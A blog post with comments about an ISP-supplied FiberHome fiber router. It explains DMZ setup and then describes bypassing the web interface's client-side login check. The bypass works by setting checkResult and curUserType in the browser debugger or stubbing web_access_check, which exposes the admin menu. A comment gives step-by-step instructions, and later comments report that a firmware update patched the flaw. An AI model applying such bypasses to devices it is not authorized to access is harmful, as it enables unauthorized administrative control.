Sunday, July 9, 2017

FiberHome AN5506-02-F router hack

I recently had to work with a home fiber router that was supplied by the ISP,  the FiberHome AN5506-02-F.

Compared to the previous internet access solution, which was based on a cable modem and required the user to use their own router, the new solution has both advantages and disadvantages. The advantages would be: integrated WiFi, security and firewall. The disadvantages: only one LAN port available (@100Mbps), only 2.4GHz (@150Mbps), outdated software, locked-down interface, no easy way to expose a second router.

The unit is very similar to the AN5506-04 model ( http://flytec.com.py/download/files/AN5506-04F-manual.pdf ), except it has only 2 UTP ports, only 1 phone port and no CATV interface.

Exposing the inner router


To get around the issue of the (old) router not being accessible from outside, the solution is to add that router into the DMZ setting. This is needed for things like web hosting, ftp server, some chat clients, torrents, etc.

You can log in with your supplied standard username and password, no need for admin rights for this. The usual link is http://192.168.1.1 . Write down your old router's MAC address, either from the 'Status -> LAN -> DHCP Clients List' or from its label.

Add the MAC address to the static leases list, just to be sure that the old router will always get the same IP. Might not be needed, but in case something happens you want to be sure that you don't expose the wrong host to the Internet.



Add the IP address from above to the DMZ zone.



Every time your IP will be accessed, the ports exposed to the outside will be the ones on your old router. Assuming the old one is more secure than the new router, this will also improve security.

There are also other ways to do this, but this one is the easiest. Not a hack, just poorly documented functionality.

Studying the firmware


The router home page uses a framed design, with the left frame (./left.asp) consisting on some hardcoded data and JS includes and the right frame being the active UI.



The hardcoded data is a crude state machine to select a different skin or menu structure based on the ISP values.
"checkResult" is the result of the login, with all values except 1,3,4,6,11 being accepted. So you can set it to 0 or 2 to signal the JS that the user is logged in. The check is only done in one place, utils.js, so you can set a breakpoint at the method entry point and override the value:



Each time the script pauses at that line, you can set the checkResult value to a valid one and press continue - most the pages will happily load. You can automate this process with a Tampermonkey script, which could override the security function with a dummy one:
web_access_check = function(i){}

We can already see two critical security problems: only client-side security and unique checkpoint.

Looking further into the request and responses (XHR) I could see that for this version of router/ISP an XML resource is being loaded:




Looks like the menu and submenu layout, this could have been deduced as well by looking at the JS code.
Changing 1.xml to 2.xml yields an advanced menu:



Tracing back how this XML is loaded, leads us back to another semi-hardcoded page:



Long story short, setting a breakpoint just before Frame.show() and setting curUserType to "2" will load the admin version of the UI.



The exposed menu items are not interesting for a normal user (they don't add features or increase speed or anything else) and can brick the router if modified.

I haven't played much more with this, but I suspect the unit might be susceptible to some basic attacks: directory traversal, RCE, privileges elevation, ...

There are some other topic that are left as an exercise for the reader: switching to different skins and languages, dumping the file system, finding out the admin username/password combo.

33 comments:

  1. Thank you for the tutorial. I find it very useful. I have enabled the second LAN 2 port and I will test it to see if it works in the future. Or maybe I can switch it to bridge mode and connect the old router.

    ReplyDelete
    Replies
    1. So I have checked LAN 2 and is only working at 100 Mbps. Pretty good if you need it for a Raspberry or TV. In the end I switched it to bridge mode and use my Gigabit router.

      Delete
    2. Hi,

      Did you manage to configure just LAN 2 port in bridge mode ?
      Thanks.

      Delete
  2. It there a more "detailed" step by step on how to do it ? for dummies like me.

    ReplyDelete
  3. Oh, I got access but it's not admin. There is any way to find out the admin user/password ?

    ReplyDelete
    Replies
    1. I haven't tried to find the default admin login or password. It probably requires access to the filesystem and some way of decoding the "/etc/shadow" file. Or perhaps the password is hardcoded in the CGI scripts.

      Delete
  4. hi, i'm currently looking for 2.xml, will you be able to send it over to me please?

    ReplyDelete
  5. I can't access it anymore as admin. Is something changed in the last few days or is just me? Or maybe it had to do with the fact that i changed de log in ”user” and ”pass”?

    ReplyDelete
    Replies
    1. The router might reset to its default user and password after a reset.

      Delete
  6. Hello,

    I have tried exactly what you said ' setting a breakpoint just before Frame.show() and setting curUserType to "2" will load the admin version of the UI.' but it returns an error and the menu/website is empty:
    https://imgur.com/Rx9oq8V
    https://imgur.com/a/5qSzD

    Greetings from Romania :)

    ReplyDelete
    Replies
    1. Strange. Perhaps you need to log in once with the normal user then try the breakpoint and set. Can't remember right now and don't have the router on-hand, but I can walk you through it.
      Otherwise, just set a breakpoint on the line with the error and see what the "request" object looks like. Just type "request" into the console or mouse over the variable.

      Delete
  7. I tried that, but with the same result.
    If you could help me and maybe guide me through it, that would be great.
    I tried to further debug this:
    It seems that it cannot load 2.xml(the file you exposed in your article), I even tried manually accessing the 2.xml file link but it redirects me automatically to the login page. The line at which the error occurs contains the following line: this.data = this._getSubMenus(1, request.responseXML.documentElement);
    I manually tried to see the contents of the responseXML array, setting curUserType=1 and curUserType=2. It seems like if the varriable = 1, then the array contains the menu links, and if the variable = 2, then the array is empty.

    Thanks

    ReplyDelete
    Replies
    1. Try to login first with the normal user, then try the hack. I think it's user/user or user/digi, should be written on the modem or the installation piece of paper.

      Delete
  8. Yep, I did login first with the normal user. Does it make a difference that I changed the default one? :) See printscreens with all the steps I did with descriptions:
    https://imgur.com/a/etnFt
    Thanks

    ReplyDelete
    Replies
    1. I have the same error, exactly like in screenshot. Ligius, you can remotely enter via teamviewer on my computer, or on Alex Stockel PC to try if you don't have a physical router?

      Delete
    2. We can perhaps set up a chat at a certain time, let's say Monday 15 Jan at 21:00 CET. For example https://bloochat.com/rb6ms . We can go further from there with TeamViewer.

      Delete
    3. Any luck resolving this? I'm encountering the same issue as Alex and Vlad. thanks

      Delete
    4. The new firmware has fixed this vulnerability

      Delete
  9. Hello. I have the same router and the folowing setup:
    1. android phone conected to WiFi
    2. samsung TV conected to RJ45 (wired lan) ith DLNA
    Andorid phone doesn't see the TV. Any thoughts on this? I guess the lan ports are filtered?!
    PS: same setup but with different router works.

    ReplyDelete
  10. This comment has been removed by the author.

    ReplyDelete
  11. I've checked it again via vpn, it works. I can make a video/screencast step-by-step but it should be like this:
    1) load the page. Open menu_romania.asp. Set a breakpoint on line 26.
    2) if you have the default user/password you can log in, skip to step 3.
    3) refresh (f5)
    4) no user/pass. Load the page, load the menu_romania.js in debugger.
    5) Set a breakpoint on line 331. Try to log in with any user.
    6) once the script breaks, type checkResult=2 in the console. Hit F8 to resume the script
    7) the script should now break in the asp file, line 26. Type curUserType="2"
    8) resume (F8)
    You should now see the admin menu.

    ReplyDelete
  12. Hi Ligius, I tried to do it with this method but I don't have the menu_romania.js I only have frame_romania.js and it has only 288 lines. I don't know if you can help me.

    ReplyDelete
  13. Hi Ligius,
    Same problem here, as explained by Alex R.
    Can you kindly make a screencast?
    Thanks

    ReplyDelete
  14. Hi, the same problem we don't have menu_romania.js just frame_romania.js

    ReplyDelete
    Replies
    1. Try to save the page: Ctrl+S, "complete" and upload it somewhere so I can take a look at it until I get access to a unit. You can use zippyshare, dropbox or anything else.

      Delete
  15. Same problem here. Ligius please give me your mail I want to speak something with you

    ReplyDelete
    Replies
    1. Write me at my first name @gmail.com . I need access to one of those "new" routers to figure out if anything's changed. Sorry I haven't had time to respond to all replies, new job.

      Delete
    2. hi, ligius I have a fiberhome an5506-04-gg, I want to know how to open the ports for a dvr

      Delete
    3. I've went with Claudiu over his router, and, after a remotely-pushed update, the vulnerability above is not present anymore.

      Delete